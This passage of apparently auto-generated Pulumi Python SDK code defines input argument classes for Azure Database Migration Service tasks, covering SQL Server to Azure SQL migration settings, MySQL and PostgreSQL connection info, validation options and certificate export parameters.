def migration_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "migration_setting", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="schemaName")
def schema_name(self) -> Optional[pulumi.Input[str]]:
"""
Schema name to be migrated
"""
return pulumi.get(self, "schema_name")
@schema_name.setter
def schema_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema_name", value)
@property
@pulumi.getter(name="sourceSetting")
def source_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Source settings to tune source endpoint migration behavior
"""
return pulumi.get(self, "source_setting")
@source_setting.setter
def source_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "source_setting", value)
@property
@pulumi.getter(name="tableMap")
def table_map(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Mapping of source to target tables
"""
return pulumi.get(self, "table_map")
@table_map.setter
def table_map(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "table_map", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Target database name
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@property
@pulumi.getter(name="targetSetting")
def target_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Target settings to tune target endpoint migration behavior
"""
return pulumi.get(self, "target_setting")
@target_setting.setter
def target_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "target_setting", value)
@pulumi.input_type
class MigrateSqlServerSqlDbSyncTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
validation_options: Optional[pulumi.Input['MigrationValidationOptionsArgs']] = None):
"""
Input for the task that migrates on-prem SQL Server databases to Azure SQL Database for online migrations
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
:param pulumi.Input['MigrationValidationOptionsArgs'] validation_options: Validation options
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if validation_options is not None:
pulumi.set(__self__, "validation_options", validation_options)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="validationOptions")
def validation_options(self) -> Optional[pulumi.Input['MigrationValidationOptionsArgs']]:
"""
Validation options
"""
return pulumi.get(self, "validation_options")
@validation_options.setter
def validation_options(self, value: Optional[pulumi.Input['MigrationValidationOptionsArgs']]):
pulumi.set(self, "validation_options", value)
@pulumi.input_type
class MigrateSqlServerSqlDbSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs']] = None):
"""
Properties for the task that migrates on-prem SQL Server databases to Azure SQL Database for online migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDb.Sync'.
:param pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.AzureSqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlDbTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
validation_options: Optional[pulumi.Input['MigrationValidationOptionsArgs']] = None):
"""
Input for the task that migrates on-prem SQL Server databases to Azure SQL Database
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
:param pulumi.Input['MigrationValidationOptionsArgs'] validation_options: Options for enabling various post migration validations. Available options,
1.) Data Integrity Check: Performs a checksum based comparison on source and target tables after the migration to ensure the correctness of the data.
2.) Schema Validation: Performs a thorough schema comparison between the source and target tables and provides a list of differences between the source and target database, 3.) Query Analysis: Executes a set of queries picked up automatically either from the Query Plan Cache or Query Store and execute them and compares the execution time between the source and target database.
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if validation_options is not None:
pulumi.set(__self__, "validation_options", validation_options)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="validationOptions")
def validation_options(self) -> Optional[pulumi.Input['MigrationValidationOptionsArgs']]:
"""
Options for enabling various post migration validations. Available options,
1.) Data Integrity Check: Performs a checksum based comparison on source and target tables after the migration to ensure the correctness of the data.
2.) Schema Validation: Performs a thorough schema comparison between the source and target tables and provides a list of differences between the source and target database, 3.) Query Analysis: Executes a set of queries picked up automatically either from the Query Plan Cache or Query Store and execute them and compares the execution time between the source and target database.
"""
return pulumi.get(self, "validation_options")
@validation_options.setter
def validation_options(self, value: Optional[pulumi.Input['MigrationValidationOptionsArgs']]):
pulumi.set(self, "validation_options", value)
@pulumi.input_type
class MigrateSqlServerSqlDbTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs']] = None):
"""
Properties for the task that migrates on-prem SQL Server databases to Azure SQL Database
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.SqlDb'.
:param pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.SqlDb')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.SqlDb'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlMIDatabaseInputArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
restore_database_name: pulumi.Input[str],
backup_file_paths: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None):
"""
Database specific information for SQL to Azure SQL DB Managed Instance migration task inputs
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[str] restore_database_name: Name of the database at destination
:param pulumi.Input[Sequence[pulumi.Input[str]]] backup_file_paths: The list of backup files to be used in case of existing backups.
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for backing up this database.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "restore_database_name", restore_database_name)
if backup_file_paths is not None:
pulumi.set(__self__, "backup_file_paths", backup_file_paths)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="restoreDatabaseName")
def restore_database_name(self) -> pulumi.Input[str]:
"""
Name of the database at destination
"""
return pulumi.get(self, "restore_database_name")
@restore_database_name.setter
def restore_database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "restore_database_name", value)
@property
@pulumi.getter(name="backupFilePaths")
def backup_file_paths(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of backup files to be used in case of existing backups.
"""
return pulumi.get(self, "backup_file_paths")
@backup_file_paths.setter
def backup_file_paths(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "backup_file_paths", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for backing up this database.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@pulumi.input_type
class MigrateSqlServerSqlMISyncTaskInputArgs:
def __init__(__self__, *,
azure_app: pulumi.Input['AzureActiveDirectoryAppArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
storage_resource_id: pulumi.Input[str],
target_connection_info: pulumi.Input['MiSqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None):
"""
Input for task that migrates SQL Server databases to Azure SQL Database Managed Instance online scenario.
:param pulumi.Input['AzureActiveDirectoryAppArgs'] azure_app: Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for source SQL Server
:param pulumi.Input[str] storage_resource_id: Fully qualified resourceId of storage
:param pulumi.Input['MiSqlConnectionInfoArgs'] target_connection_info: Connection information for Azure SQL Database Managed Instance
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
"""
pulumi.set(__self__, "azure_app", azure_app)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
@property
@pulumi.getter(name="azureApp")
def azure_app(self) -> pulumi.Input['AzureActiveDirectoryAppArgs']:
"""
Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
"""
return pulumi.get(self, "azure_app")
@azure_app.setter
def azure_app(self, value: pulumi.Input['AzureActiveDirectoryAppArgs']):
pulumi.set(self, "azure_app", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
Fully qualified resourceId of storage
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MiSqlConnectionInfoArgs']:
"""
Connection information for Azure SQL Database Managed Instance
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MiSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@pulumi.input_type
class MigrateSqlServerSqlMISyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs']] = None):
"""
Properties for task that migrates SQL Server databases to Azure SQL Database Managed Instance sync scenario
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI.Sync.LRS'.
:param pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.AzureSqlDbMI.Sync.LRS')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI.Sync.LRS'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlMITaskInputArgs:
def __init__(__self__, *,
backup_blob_share: pulumi.Input['BlobShareArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None,
backup_mode: Optional[pulumi.Input[Union[str, 'BackupMode']]] = None,
selected_agent_jobs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
selected_logins: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input for task that migrates SQL Server databases to Azure SQL Database Managed Instance.
:param pulumi.Input['BlobShareArgs'] backup_blob_share: SAS URI of Azure Storage Account Container to be used for storing backup files.
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
:param pulumi.Input[Union[str, 'BackupMode']] backup_mode: Backup Mode to specify whether to use existing backup or create new backup. If using existing backups, backup file paths are required to be provided in selectedDatabases.
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_agent_jobs: Agent Jobs to migrate.
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_logins: Logins to migrate.
"""
pulumi.set(__self__, "backup_blob_share", backup_blob_share)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
if backup_mode is not None:
pulumi.set(__self__, "backup_mode", backup_mode)
if selected_agent_jobs is not None:
pulumi.set(__self__, "selected_agent_jobs", selected_agent_jobs)
if selected_logins is not None:
pulumi.set(__self__, "selected_logins", selected_logins)
@property
@pulumi.getter(name="backupBlobShare")
def backup_blob_share(self) -> pulumi.Input['BlobShareArgs']:
"""
SAS URI of Azure Storage Account Container to be used for storing backup files.
"""
return pulumi.get(self, "backup_blob_share")
@backup_blob_share.setter
def backup_blob_share(self, value: pulumi.Input['BlobShareArgs']):
pulumi.set(self, "backup_blob_share", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@property
@pulumi.getter(name="backupMode")
def backup_mode(self) -> Optional[pulumi.Input[Union[str, 'BackupMode']]]:
"""
Backup Mode to specify whether to use existing backup or create new backup. If using existing backups, backup file paths are required to be provided in selectedDatabases.
"""
return pulumi.get(self, "backup_mode")
@backup_mode.setter
def backup_mode(self, value: Optional[pulumi.Input[Union[str, 'BackupMode']]]):
pulumi.set(self, "backup_mode", value)
@property
@pulumi.getter(name="selectedAgentJobs")
def selected_agent_jobs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Agent Jobs to migrate.
"""
return pulumi.get(self, "selected_agent_jobs")
@selected_agent_jobs.setter
def selected_agent_jobs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "selected_agent_jobs", value)
@property
@pulumi.getter(name="selectedLogins")
def selected_logins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Logins to migrate.
"""
return pulumi.get(self, "selected_logins")
@selected_logins.setter
def selected_logins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "selected_logins", value)
@pulumi.input_type
class MigrateSqlServerSqlMITaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlMITaskInputArgs']] = None):
"""
Properties for task that migrates SQL Server databases to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI'.
:param pulumi.Input['MigrateSqlServerSqlMITaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.AzureSqlDbMI')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlMITaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlMITaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrationValidationOptionsArgs:
def __init__(__self__, *,
enable_data_integrity_validation: Optional[pulumi.Input[bool]] = None,
enable_query_analysis_validation: Optional[pulumi.Input[bool]] = None,
enable_schema_validation: Optional[pulumi.Input[bool]] = None):
"""
Types of validations to run after the migration
:param pulumi.Input[bool] enable_data_integrity_validation: Allows to perform a checksum based data integrity validation between source and target for the selected database / tables .
:param pulumi.Input[bool] enable_query_analysis_validation: Allows to perform a quick and intelligent query analysis by retrieving queries from the source database and executes them in the target. The result will have execution statistics for executions in source and target databases for the extracted queries.
:param pulumi.Input[bool] enable_schema_validation: Allows to compare the schema information between source and target.
"""
if enable_data_integrity_validation is not None:
pulumi.set(__self__, "enable_data_integrity_validation", enable_data_integrity_validation)
if enable_query_analysis_validation is not None:
pulumi.set(__self__, "enable_query_analysis_validation", enable_query_analysis_validation)
if enable_schema_validation is not None:
pulumi.set(__self__, "enable_schema_validation", enable_schema_validation)
@property
@pulumi.getter(name="enableDataIntegrityValidation")
def enable_data_integrity_validation(self) -> Optional[pulumi.Input[bool]]:
"""
Allows to perform a checksum based data integrity validation between source and target for the selected database / tables .
"""
return pulumi.get(self, "enable_data_integrity_validation")
@enable_data_integrity_validation.setter
def enable_data_integrity_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_data_integrity_validation", value)
@property
@pulumi.getter(name="enableQueryAnalysisValidation")
def enable_query_analysis_validation(self) -> Optional[pulumi.Input[bool]]:
"""
Allows to perform a quick and intelligent query analysis by retrieving queries from the source database and executes them in the target. The result will have execution statistics for executions in source and target databases for the extracted queries.
"""
return pulumi.get(self, "enable_query_analysis_validation")
@enable_query_analysis_validation.setter
def enable_query_analysis_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_query_analysis_validation", value)
@property
@pulumi.getter(name="enableSchemaValidation")
def enable_schema_validation(self) -> Optional[pulumi.Input[bool]]:
"""
Allows to compare the schema information between source and target.
"""
return pulumi.get(self, "enable_schema_validation")
@enable_schema_validation.setter
def enable_schema_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_schema_validation", value)
@pulumi.input_type
class MySqlConnectionInfoArgs:
def __init__(__self__, *,
port: pulumi.Input[int],
server_name: pulumi.Input[str],
type: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
Information for connecting to MySQL server
:param pulumi.Input[int] port: Port for Server
:param pulumi.Input[str] server_name: Name of the server
:param pulumi.Input[str] type: Type of connection info
Expected value is 'MySqlConnectionInfo'.
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "type", 'MySqlConnectionInfo')
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port for Server
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
Name of the server
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'MySqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class PostgreSqlConnectionInfoArgs:
def __init__(__self__, *,
port: pulumi.Input[int],
server_name: pulumi.Input[str],
type: pulumi.Input[str],
database_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
Information for connecting to PostgreSQL server
:param pulumi.Input[int] port: Port for Server
:param pulumi.Input[str] server_name: Name of the server
:param pulumi.Input[str] type: Type of connection info
Expected value is 'PostgreSqlConnectionInfo'.
:param pulumi.Input[str] database_name: Name of the database
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "type", 'PostgreSqlConnectionInfo')
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port for Server
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
Name of the server
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'PostgreSqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SelectedCertificateInputArgs:
def __init__(__self__, *,
certificate_name: pulumi.Input[str],
password: pulumi.Input[str]):
"""
Info for certificate to be exported for TDE enabled databases.
:param pulumi.Input[str] certificate_name: Name of certificate to be exported.
:param pulumi.Input[str] password: Password to use for encrypting the exported certificate.
"""
pulumi.set(__self__, "certificate_name", certificate_name)
pulumi.set(__self__, "password", password)
@property
@pulumi.getter(name="certificateName")
def certificate_name(self) -> pulumi.Input[str]:
"""
Name of certificate to be exported.
"""
